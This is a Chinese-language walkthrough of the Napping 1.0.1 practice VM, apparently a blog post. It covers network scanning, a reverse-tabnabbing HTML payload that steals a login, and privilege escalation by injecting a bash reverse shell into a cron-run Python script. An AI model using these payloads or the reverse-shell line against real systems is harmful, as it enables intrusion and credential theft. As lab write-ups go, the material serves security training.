当前位置: 首页 > news >正文

napping-1.0.1靶机练习

导入vb虚拟机中,开启桥接模式,kali也是

扫描网段,获取靶机地址

nmap -sP 172.16.2.1/24        快速扫描,适用于较多主机时

nmap -p- 172.16.2.64

访问一下

是个登录页面,我们没有账号,注册一个

页面出现一个文本框,框内输入类似网址的格式

我们输入http://www.baidu.com尝试

我们输入什么他就会跳转什么

在当前目录新建一个1.html文件,其中ip为kali的ip

<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://172.16.2.63:81/2.html');
</script>
</body>
</html>

新建2.html文件
<html>

<title>正常网站</title>

<body>
asdf
</body>

</html>

开启服务         python -m http.server 800

开启对81端口的监听:nc -lvvp 81

访问网址  http://172.16.2.63 可以看到我们写的文件

我们提交      http://172.16.2.63:800/1.html       到网址处

监听的端口会带回用户名和密码

username=daniel&password=C%40ughtm3napping123 sent 0, rcvd 266

账号为daniel               密码为C@ughtm3napping123

我们之前扫描看到了ssh服务开启,尝试xshell连接登录,新建会话,填写信息,登录

查看用户id        属于administrators组         再查看一下能运行的程序

find / -group administrators 2>/dev/null

/home/adrian/query.py

查看文件发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell。

在/home/daniel下写入shell.sh文件

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/172.16.2.63/8000 0>&1'

然后在query.py文件中添加对shell.sh脚本的执行

import os
os.system('/usr/bin/bash /home/daniel/shell.sh')

在kali端开启对8000端口的监听

http://www.lryc.cn/news/603925.html

相关文章:

  • MySQL(配置)——MariaDB使用
  • 2025年Solar应急响应公益月赛-7月笔记ing
  • Java 10 新特性解析
  • 机器学习笔记(四)——聚类算法KNN、Kmeans、Dbscan
  • 域名常见问题集(九)——域名市场介绍
  • 基于JavaWeb的兼职发布平台的设计与实现
  • LangChain和LangGraph 里面的 `create_react_agent`有什么不同
  • 从0到1理解大语言模型:读《大语言模型:从理论到实践(第2版)》笔记
  • Marin说PCB之POC电路layout设计仿真案例---10
  • AI 对话玩具的语音芯片模块方案设计与应用场景​
  • 如何解决人工智能在社会治理中面临的技术和伦理挑战?
  • 【tips】小程序css ➕号样式
  • 项目质量如何把控?核心要点分析
  • 信号上升时间与带宽的关系
  • 技术QA | GNSS模拟器如何赋能自动驾驶?聚焦HIL、多实例与精准轨迹仿真的技术优势
  • leetcode 74. 搜索二维矩阵
  • 从传统到智能:Midscene.js 如何用 AI 颠覆自动化测试!
  • Baumer工业相机堡盟工业相机如何通过YoloV8深度学习模型实现各种食物的类型检测识别(C#代码UI界面版)
  • 【三桥君】企业级AI应用需要系统工程支撑,如何通过MCP大模型架构实现全链路实战解构?
  • 2.4G和5G分别指什么,什么是带宽(频谱带宽和网络带宽)
  • Solar月赛(应急响应)——攻击者使用什么漏洞获取了服务器的配置文件?
  • 数据结构 排序(1)---插入排序
  • 广泛分布于内侧内嗅皮层全层的速度细胞(speed cells)对NLP中的深层语义分析的积极影响和启示
  • 自动化测试实战篇
  • win10更新异常,导致Microsoft Store 无法正常启用,无法正常安装exe应用程序。
  • 银行交易欺诈检测模型分析
  • 微服务 01
  • 【C++算法】76.优先级队列_前 K 个高频单词
  • 【车联网kafka】Kafka核心架构与实战经验(第一篇)
  • 13、select_points_object_model_3d解析